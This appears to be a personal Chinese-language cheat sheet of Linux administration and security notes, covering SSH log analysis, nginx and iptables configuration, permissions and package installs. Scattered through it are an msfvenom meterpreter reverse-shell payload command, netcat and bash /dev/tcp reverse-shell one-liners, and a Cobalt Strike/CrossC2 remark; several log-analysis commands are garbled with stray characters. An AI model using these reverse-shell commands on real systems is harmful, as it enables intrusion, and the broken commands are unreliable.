目前誰在登陸 w
查看設置開啟自啟動程序: systemctl list-unit-files | grep enabled
實時監(jiān)聽某文件 tail -f
及時發(fā)現(xiàn)2分鐘內(nèi)數(shù)據(jù)變化find /root/ -mmin -2
目錄來用存儲日志 nginx錯誤日志/訪問日志等 var (/var/log/nginx)
臨時/永久關閉防火墻 systemctl stop/enabled firewalld
查詢比find效率高 which
查看PHP相關軟件包 rqm -qa | grep php
查看服務進程信息 ps -ef|grep php / ps aux | grep iptables
查看服務端口信息 netstat -lntup 篩選 netstat -anp | grep php
查看所有的關于yum的鏡像源: yum list all | grep iptables
設置開機自啟: systemctl enable iptables.service
搜索文件 which find/php/apache等
查看文件末尾幾行 cat /etc/passwd | tail -n 4
kali無法上網(wǎng)參考:http://www.reibang.com/p/c3512daed318
systemctl restart networking
查看登陸失敗
grep -o "Failed password" /var/ log / secure / uniq -c
輸出登錄爆破的第一行和最后一行痹届,確認爆破時間范圍:
grep "Failed password"/var / log / secure | head -1
grep "Failed password" /var/ log / secure | tail -1
篩選出登陸失敗的IP
grep "Failed password"/var/log/securel grep -E-o "(25[ 0-5]l2[ 0-4] [0-9]| [01] ? [0-9] [0-9] ?) \.(25[0-5] /2[ 0-4 ] [0-9]I [01] ? [ 0-9][ o-9] ?) \.(25 [ 0-5]|2[0-4 ][ 0-9] I [01] ? [ 0-9] [ 0-9]?) \.(25[0-5] l2 [ o-4][0-9] | [ 01] ? [ 0-9] [0-9]? ) " l uniq -c l sort -nr
登錄成功的日期妈踊、 用戶、IP
rep "Accepted " /var/ log / secure l awk ' { print$1,$2,$3,$9,$11} '
grep "Accepted " /var/log/secure / awk 'iprint $11} 'l sort luniq -c l sort -nr / more
linux自動化查殺
Gsscan自動化查殺
腳本檢測 : 木馬后門, suid提權, 日志分析是否有爆破登陸,可疑端口
cs中l(wèi)inux也可以進行上線,需要把插件移入cs中并給777權限
借助crossC2項目: netstat -ntulp https://github. com/gloxec/CrossC2
windows自動化查殺
TCPView * 和 processexplorerchs-v16.32 *********** 遠程連接進程
pcHunter進行端口 進程 日志 啟動項的分析
UserAssistView 在機器上操作的文件記錄
logonSessions 鏈接的會話
Autoruns 官方自帶的工具 , 啟動項
logfusion6.3.1工具 可以看系統(tǒng)地址 4625登陸失敗 4624登陸成功
好用的庫或擴展
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.122 LPORT=2333 -e x86/shikata_ga_nai -i 15 -f csharp -o payload.txt
lrzsz : rz上傳 --- 可以實現(xiàn)windows和linux系統(tǒng)數(shù)據(jù)相互傳輸
bash-completion : 補全代碼(裝一個爽得很)
cowsay (animalsay): 打印小動物
反彈shell :nc -lvvp 9999 -t -e /bin/bash ---nc瑞士軍刀 -l本地監(jiān)聽 -vv詳細信息 -p端口 開啟本地端口發(fā)布出去-----windows可使用 nc.exe ip 9999鏈接linux
bash直接反彈 :1.bash -i >& /dev/tcp/192.168.1.1/8080 0>&1 2.本地 nc -l -p 8080
firewalld 防火墻與selinux
臨時關閉: systemctl stop firewalld
永久關閉: systemctl disable firewalld
selinux: 在某些特定場景限制系統(tǒng)root用戶權利
臨時關閉: setenforce 0 永久關閉: vi /etc/selinux/config => SELINUX=disabled
文件:
DNS服務配置文件查看: /etc/resolv.conf
本地DNS映射文件: /etc/hosts
開啟自動加載程序文件: /etc/rc.local
系統(tǒng)日志文件: /var/log/messages
tail -f --- 實時追蹤日志文件信息變化
ls -rt --- 按照時間信息進行反向排序,顯示最新改動數(shù)據(jù)信息
vi : G尾行 gg首頁 yy復制 p粘貼 dd刪除 u撤銷 ctrl+r反撤銷 ^首航 $尾行
ser nu/ set nonu 顯示/取消行號
tar zcvf /xx : 壓縮
tar tf xxx : 檢查確認
tar xvf xxx : 解壓
zip test.zip test.txt 壓縮test.text到test.zip
unzip test.zip -d /root/ 解壓zip文件到 /root/下
網(wǎng)卡:
圖形方式: nmtui
文件調(diào)整: /etc/sysconfig/network-scripts/ifcfg-eth0
檢索文件信息內(nèi)容:
grep "oldboyedu" /etc/services --- 直接將指定信息檢索出來
grep "^[a-Z]" /etc/selinux/config
grep -r "oldboy" /root --- 篩選目錄中所有文件信息
find /etc/ -type f -size +5M 單位 c k M G +大于多少文件 - 小于多少文件 沒有+-正好多大文件
find /root/ -mtime +7
find /root/ -mtime -7
find /root/ -mmin -2 及時發(fā)現(xiàn)2分鐘內(nèi)數(shù)據(jù)變化
系統(tǒng)
版本信息查看: cat /etc/redhat-release
內(nèi)存信息查看: free -h top
磁盤使用情況: df -h
CPU運行狀況: lscpu top
用戶登錄情況: w ps -ef 查找進程 kill 進程號(PID)
yum優(yōu)化
查看當前yum源:cat /etc/yum.repos.d/CentOS-Base.repo
curl -o /etc/yum.repos.d/CentOS-Base.repo http://mirrors.aliyun.com/repo/Centos-7.repo
curl -o /etc/yum.repos.d/epel.repo http://mirrors.aliyun.com/repo/epel-7.repo
目錄解說 tree -L 1
bin -> usr/bin --- 里面存儲的是命令文件信息 二進制文件
usr --- 磁盤發(fā)展歷史過程中,產(chǎn)生的新的掛載點目錄
sbin -> usr/sbin --- 里面存儲的是命令文件信息 超級管理員可以執(zhí)行命令
boot --- 存放系統(tǒng)運行啟動文件信息
dev --- 存儲設備文件信息
etc*** --- 保存系統(tǒng)服務或者第三方服務程序配置文件
home --- 普通用戶家目錄
root --- 管理員用戶家目錄
lib -> usr/lib --- 存放程序服務會加載一些庫文件
lib64 -> usr/lib64
mnt --- 臨時掛載點目錄
opt*** --- 存放第三方程序安裝數(shù)據(jù)信息
proc --- 內(nèi)核文件信息 進程文件 系統(tǒng)狀態(tài)信息 --- 可以用于優(yōu)化系統(tǒng)/提升安全性
此目錄中存儲數(shù)據(jù)信息都是默認存儲在內(nèi)存中
tmp --- 臨時目錄 臨時存儲數(shù)據(jù)信息(不太重要) 充當回收站
var --- 存儲經(jīng)常變化的數(shù)據(jù)信息 日志文件
ngninx配置解析
1.基礎
server {
listen 80; 指定服務監(jiān)聽端口信息 用于接收用戶訪問請求
server_name xxxx.com; 指定網(wǎng)站域名信息
root /html/www; 指定服務站點目錄
index index.html; 指定首頁文件信息 會進行默認加載
}
2.編寫共享網(wǎng)站配置信息
server {
listen 80;
server_name share.xxxx.com;
root /html/share;
autoindex on;
}
nginx.conf主配置文件中:
include /etc/nginx/mime.types; --- 媒體資源類型文件哥童,識別用戶想訪問資源信息
default_type application/octet-stream; --- 未知文類型或默認識別為application/octet-stream
默認加載識別為octet-stream類型文件豁护,會直接進行下載
3.可以根據(jù)用戶地址信息進行訪問控制
決絕訪問會顯示403錯誤狀態(tài)碼
server {
listen 80;
server_name share.xxxx.com;
root /html/share;
autoindex on;
charset utf-8;
location /內(nèi)部資源/ {
allow 10.0.0.1;
deny all;
}
}
4.可以根據(jù)用戶登陸信息進行訪問控制
第一個歷程:編寫配置文件信息
server {
listen 80;
server_name share.xxxx.com;
root /html/share;
autoindex on;
charset utf-8;
location /內(nèi)部資源/ {
allow 10.0.0.1;
deny all;
}
location /收費資源VIP/ {
auth_basic "高管登錄認證"; --- 開啟認證功能
auth_basic_user_file /etc/nginx/password.txt; --- 指定加載一個用戶密碼文件
}
}
第二個歷程:生成密碼文件
yum install -y httpd-tools
htpasswd -c /etc/nginx/password.txt oldboy --- 設置用戶密文密碼信息
第三個歷程:進行認證測試訪問
5.實現(xiàn)網(wǎng)站服務監(jiān)聽(有工具比這個更好)
server {
listen 80;
server_name www.xxxx.com;
root /html/www;
index index.html;
location /status/ {
stub_status; --- 開啟監(jiān)控平臺頁面
}
}
6.讓nginx和php建立關系
server {
listen 80 default_server;
server_name bbs.oldboy.com;
root /html/bbs;
index index.php index.html;
location ~ .phpdocument_root$fastcgi_script_name; --- 可以精準告知PHP需要處理文件路徑信息
include fastcgi_params;
}
}
日志
error.log --- 記錄網(wǎng)站服務運行或者訪問過程中錯誤信息
access.log --- 記錄訪問者訪問信息
① 記錄客戶端IP地址
② 記錄認證登錄用戶信息
③ 客戶端訪問網(wǎng)站時間信息
④ 獲取訪問網(wǎng)站請求方法和請求資源 和安全有關
⑤ 狀態(tài)信息
⑥ 訪問過程消耗的網(wǎng)站流量
⑦ 記錄訪問此頁面是通過哪個網(wǎng)站進行引流轉(zhuǎn)發(fā)的
⑧ 客戶端利用什么軟件在訪問網(wǎng)站服務
日志分析工具
基礎權限
提權操作
root用戶操作: visudo == vi /etc/sudoers
root ALL=(ALL) ALL
oldboy ALL=(ALL) /usr/sbin/useradd, /usr/bin/vi /etc/sysconfig/network-scripts/ifcfg-eth0
01. 直接查看已有權利 sudo -l
02. 賦予權利可以免密碼執(zhí)行特性操作 oldboy ALL=(ALL) NOPASSWD: /usr/sbin/useradd, /usr/bin/vi /etc/sysconfig/network-scripts/ifcfg-eth0
除了rwx還有特殊權限: setuid setgid 粘滯位
setuid 對于命令文件賦予特殊權限
讓所有用戶可以擁有屬主用戶能力
賦予setuid方式:
chmod u+s
setgid 對于命令文件賦予特殊權限
讓所有用戶組可以擁有屬組權限能力
chmod g+s
粘滯位:
將一些設置共享權限目錄賦予粘滯位, 會讓共享數(shù)據(jù)用戶只能管理自己的數(shù)據(jù)
對于其他人的數(shù)據(jù)只能進行查看, 不能刪除或者重命名操作
chmod o+t /目錄/
主u(root) -> 組g (group) -> 其它用戶o(othre)
chmod操作 : r:4 w:2 x:1 -:0
給予權限 : chmod 777 或 chmod (u/g/o) (+/-/=r) 目錄 給其它用戶 (添加/刪除/只有)讀權限
/etc/passwd --- 記錄整個系統(tǒng)中所有用戶信息
/etc/shadow --- 記錄整個系統(tǒng)中所有用戶密碼信息
4種軟件部署方式
- 利用yum方式安裝 apt-get
特點說明:
1)需要連接外網(wǎng)
2)軟件下載并安裝
3)可以解決軟件依賴
yum install -y vim telnet
yum reinstall -y vim telnet
yum remove/erase vim telnet 慎用
yum search/provides 命令信息或文件信息 獲取軟件包名稱信息/驗證軟件包是否存在
- 利用rpm方式安裝
lrzsz (需裝改擴展)
特點說明:
1)無法解決依賴問題
2)可以不用連接外網(wǎng)
第一個歷程:需要下載好軟件程序包
第二個歷程:將下載好的程序包放入到系統(tǒng)中
rz -y --- 加載需要上傳的數(shù)據(jù) 上傳過程
sz -y oldboy.txt --- 下載需要保存數(shù)據(jù)信息 下載過程
3.編譯安裝程序
第三種方式:編譯安裝程序
特點說明:
1)無法解決依賴問題
2)可以不用連接外網(wǎng)
3)可以定制化安裝軟件程序 ***
第一個歷程:需要下載好程序包(壓縮包)/解壓程序包
第二個歷程:進入到解壓后的程序目錄
第三個歷程:進行軟件部署配置過程 開啟功能/指定程序保存目錄
第四個歷程:編譯過程 翻譯 (軟件程序代碼信息翻譯后讓系統(tǒng)識別代碼)
第五個歷程:編譯安裝過程
4.編譯安裝程序
特點說明:
1)安裝部署過程方便
2)無法解決依賴問題
3)無需連接外網(wǎng)環(huán)境
nginx程序:
第一種方式:yum安裝軟件程序
yum install -y nginx
第二種方式:采用編譯方式安裝
第一個歷程:下載軟件程序源碼包
wget http://nginx.org/download/nginx-1.18.0.tar.gz
第二個歷程:需要解決軟件依賴問題
yum install -y pcre-devel openssl-devel
第三個歷程:解壓軟件程序/進行配置過程
cd nginx
useradd -M -s /sbin/nologin nginx (用戶不存在 可以創(chuàng)建出來)
./config
--prefix=PATH --- 指定安裝程序數(shù)據(jù)保存目錄
--user=USER --- 管理服務進程用戶(虛擬用戶)信息
--with-http_ssl_module --- 表示開啟了https訪問能
--with-http_stub_status_module --- 表示開啟nginx服務狀態(tài)監(jiān)控功能
第四個歷程: 編譯過程
make
第五個歷程: 編譯安裝
make install
啟動服務程序:進行測試
方式一:yum安裝軟件啟動服務
systemctl start nginx
方式二:編譯安裝需要使用命令腳本
/app/nginx/sbin/nginx --- 啟動程序
==============================================
網(wǎng)站服務啟動之后断部。無法訪問頁面排查方法:
1)確認服務運行狀態(tài)
2)確認服務網(wǎng)絡配置
ping 10.0.0.100
telnet 10.0.0.100 80
3)可以在命令行測試頁面
curl -I 10.0.0.100
==============================================
05. 網(wǎng)站服務目錄結(jié)構(gòu):
1)配置文件所在目錄
/etc/nginx nginx.conf conf.d/xxx.conf --- yum安裝軟件配置目錄
/app/nginx/conf/ nginx.conf --- 編譯安裝軟件配置目錄
2)站點目錄所在位置 (圖片 音頻 視頻 代碼文件)
/usr/share/nginx/html/ --- 默認網(wǎng)站站點目錄
3)網(wǎng)站日志文件保存目錄
/var/log/nginx --- 程序日志文件信息
防火墻服務概念介紹
1.主機與主機之間通訊過程,數(shù)據(jù)包傳遞方式
主機A --->
數(shù)據(jù)信息
傳輸層頭部信息 (TCP UDP 源端口 :目標端口)+ 數(shù)據(jù)信息
網(wǎng)絡層頭部 (IP 源IP:目標IP) 傳輸層頭部+數(shù)據(jù)信息
鏈路層頭部 (源mac:目標mac) 網(wǎng)絡層頭部+傳輸層頭部+數(shù)據(jù)信息
物理層 將所有數(shù)據(jù)信息轉(zhuǎn)換為二進制信息 01010101011101
網(wǎng)卡(網(wǎng)線) 將0信號變?yōu)榈碗妷簜鬟f 1信號高電壓
主機B <---
網(wǎng)卡(網(wǎng)線) 將電信號轉(zhuǎn)為二進制信息
物理層 將二進制信息轉(zhuǎn)換成數(shù)據(jù)包
鏈路層 源mac:目標mac 是不是自己本地主機上的mac地址
網(wǎng)絡層 源IP:目標IP 是不是自己本地主機上的IP地址
傳輸層 源端口:目標端口
查看到數(shù)據(jù)信息 處理響應
2.Iptables是什么班缎?
開源的基于數(shù)據(jù)包過濾的防火墻工具蝴光,實現(xiàn)數(shù)據(jù)的流入與流出控制
Iptables主要工作在OSI七層的二(鏈路層-很少關注)她渴、三(網(wǎng)絡層)、四(傳輸層)層蔑祟,如果重新編譯內(nèi)核趁耗,
Iptables也可以支持7層控制(squid代理+iptables)。
===========================================================================
iptables使用原則:
1)用戶并發(fā)訪問量不大時 使用軟件防火墻即可
2)用戶并發(fā)訪問量較高時 使用硬件防火墻
===========================================================================
容器概念:裝東西器皿
iptables程序容器:表概念-- 防護墻中的表擁有不同的功能策略 疆虚?苛败?? 包過濾
表容器: 鏈概念-- 控制數(shù)據(jù)包處理方式 装蓬?著拭? 進入包進行過濾
鏈容器: 策略概念 -- 不同配置信息 s 10.0.0.1地址 阻止/允許
s 11.0.0.1地址 阻止/允許
表和鏈概念:四表五鏈
Filter:這是默認表, 實現(xiàn)數(shù)據(jù)過濾處理
INPUT: 流量進入時,進行處理方式
OUTPUT: 流量出去時牍帚,進行處理方式
FORWARD:留經(jīng)網(wǎng)卡流量
NAT:當遇到新創(chuàng)建的數(shù)據(jù)包連接時將參考這個表, 會將數(shù)據(jù)進行映射轉(zhuǎn)換
源IP地址:10.0.0.1 局域網(wǎng)識別有效 --- 互聯(lián)網(wǎng) 172.16.0.1
目標IP地址:172.16.0.1 局域網(wǎng)識別有效 --- 局域網(wǎng) 10.0.0.1
端口映射轉(zhuǎn)換: 9000 --> 80
地址轉(zhuǎn)換原因:IP地址是有限的 0.0.0.0 ~ 255.255.255.255 40+億
IP地址重復使用 只有少部分可以重復使用 私網(wǎng)地址/公網(wǎng)地址
OUTPUT: 自身產(chǎn)生的流量在出去時儡遮,做映射轉(zhuǎn)換
PREROUTING: 經(jīng)過數(shù)據(jù)流量,在進入時做映射轉(zhuǎn)換
POSTROUTING: 經(jīng)過數(shù)據(jù)流量暗赶,在出去時做映射轉(zhuǎn)換
Managle:可以將數(shù)據(jù)包信息進行修改調(diào)整
raw: 將數(shù)據(jù)包某些標記信息進行拆解
04. 防火墻工作原理說明 filter表工作原理
工作流程小結(jié):
1. 防火墻是層層過濾的鄙币,實際是按照配置規(guī)則的順序從上到下,從前到后進行過濾的蹂随。
2. 如果匹配上規(guī)則十嘿,即明確表示是阻止還是通過,數(shù)據(jù)包就不再向下匹配新的規(guī)則岳锁。
3. 如果規(guī)則中沒有明確表明是阻止還是通過的绩衷,也就是沒有匹配規(guī)則,向下進行匹配激率,直到匹配默認規(guī)則得到明確的阻止還是通過咳燕。
4. 防火墻的默認規(guī)則是所有規(guī)則執(zhí)行完才執(zhí)行的。
05. 防火墻服務部署過程
yum install iptables-services
systemctl start iptables.service
[root@oldboy123 ~]# iptables -nL
Chain INPUT (policy ACCEPT)
target prot opt source destination
ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED
ACCEPT icmp -- 0.0.0.0/0 0.0.0.0/0
ACCEPT all -- 0.0.0.0/0 0.0.0.0/0
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:22
REJECT all -- 0.0.0.0/0 0.0.0.0/0 reject-with icmp-host-prohibited
Chain FORWARD (policy ACCEPT)
target prot opt source destination
REJECT all -- 0.0.0.0/0 0.0.0.0/0 reject-with icmp-host-prohibited
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
拒絕 10.0.0.10/24 訪問主機22端口
允許 10.0.0.0/24 訪問主機22端口
06. 防火墻服務應用方法
iptables命令基本用法:
查看信息用法:
iptables -n -L --- L列表顯示相應表策略信息 n 盡量信息以數(shù)值方式顯示
iptables -n -L -t 表名 --- 具體查看每個表配置信息
iptables -nL -v --- 顯示詳細配置規(guī)則信息
iptables -nL --line-number --- 查看規(guī)則序號信息
初始化清除操作:
默認配置信息乒躺,舊的配置信息
[root@A ~]# iptables -F # 清空規(guī)則招盲,但不會刪除默認規(guī)則
-F #<==清除一個鏈或所有鏈上的規(guī)則
[root@A ~]# iptables -Z # 清空防火墻計數(shù)器 可以用于排錯
-Z #<==鏈的記數(shù)器清零
[root@A ~]# iptables -X # 清空自定義規(guī)則
-X #<==刪除用戶自定義的鏈
方法一:利用防火墻實現(xiàn)數(shù)據(jù)包過濾
eg01:禁止外網(wǎng)用戶訪問服務22端口 基于四層進行過濾處理
iptables -t filter -A INPUT -p tcp --dport 22 -j DROP 添加規(guī)則
iptables -t filter -D INPUT 序號 添加規(guī)則
iptables -t filter -A OUTPUT -p tcp --sport 22 -j DROP 添加規(guī)則
eg02:只禁止10.0.0.1訪問22端口 基于三層和四層進行過濾
iptables -t filter -A INPUT -s 10.0.0.1 -p tcp --dport -j DROP
iptables -t filter -A OUTPUT -d 10.0.0.1 -p tcp --sport -j DROP
iptables -t filter -A INPUT -s 10.0.0.0/24 -d 172.16.0.0/24 DROP
eg03:實現(xiàn)禁止ping
雙方向禁ping
iptables -t filter -A INPUT -p icmp -j DROP 徹底實現(xiàn)了禁止ping過程
單反向禁ping
iptables -A INPUT -p icmp --icmp-type 8 -j DROP 禁止windows ping linux
iptables -A OUTPUT -p icmp --icmp-type 8 -j DROP 禁止linux ping windows
icmp協(xié)議說明:
8類型是請求icmp包
0類型是響應icmp包
禁止windows --- linux linux上配置禁止icmp8類型包進來
eg04:禁止多個端口不能訪問
多端口進行規(guī)則配置:
方式一:連續(xù)多端口進行阻止
iptables -A INPUT -p tcp --dport 23:80 -j DROP
方式二:間隔多端口進行配置
iptables -A INPUT -p tcp --dport 23,25,80 -j DROP
iptables -A INPUT -m multiport -p tcp --dport 23,25,80 -j DROP
eg05:如何調(diào)整規(guī)則順序
iptables -I INPUT -p tcp --dport 22 -j DROP --- 將指定插入到某個規(guī)則之上 或直接插入到第一條規(guī)則
-t -A -D -I -s -d -p --dport --sport -j -m
eg05:默認規(guī)則修改
默認規(guī)則修改為: ACCEPT 鏈規(guī)則采用黑名單
默認規(guī)則修改為: DROP 鏈規(guī)則采用白名單 最安全
iptables -P INPUT DROP
11:45 ~ 12:00 休息15分鐘
方法二:利用防火墻實現(xiàn)數(shù)據(jù)包映射
1)將擁有內(nèi)網(wǎng)IP地址主機 實現(xiàn)訪問互聯(lián)網(wǎng)
第一個歷程:配置內(nèi)網(wǎng)地址網(wǎng)卡信息
網(wǎng)卡地址:172.16.1.10/24
網(wǎng)關地址:172.16.1.201
DNS地址: 223.5.5.5
第二個歷程:開啟防火墻服務器轉(zhuǎn)發(fā)功能
vi /etc/sysctl.conf
net.ipv4.ip_forward = 1
sysctl -p --- 加載系統(tǒng)內(nèi)核配置
第三個歷程:配置防火墻NAT功能實現(xiàn)內(nèi)網(wǎng)訪問外網(wǎng)
iptables -t nat -A POSTROUTING -s 172.16.1.10 -o eth0 -j SNAT --to-source 10.0.0.200
2)實現(xiàn)外網(wǎng)主機可以訪問內(nèi)網(wǎng)服務
iptables -t nat -A PREROUTING -d 10.0.0.200 -p tcp --dport 9000 -j DNAT --to-destination 172.16.1.10:3389
10.0.0.200 9000 === 172.16.1.10 3389
總結(jié):將iptables命令參數(shù)進行熟悉
PS:防火墻配置完畢后,一定要保存配置
iptables-save >/etc/sysconfig/iptables
第一步:開啟kail 遠程ssh嘉冒,開啟辦法如下:
修改sshd_config文件曹货,命令為:vi /etc/ssh/sshd_config
將#PasswordAuthentication no的注釋去掉,并且將NO修改為YES //kali中默認是yes
將PermitRootLogin without-password修改為PermitRootLogin yes
然后讳推,保存顶籽,退出vi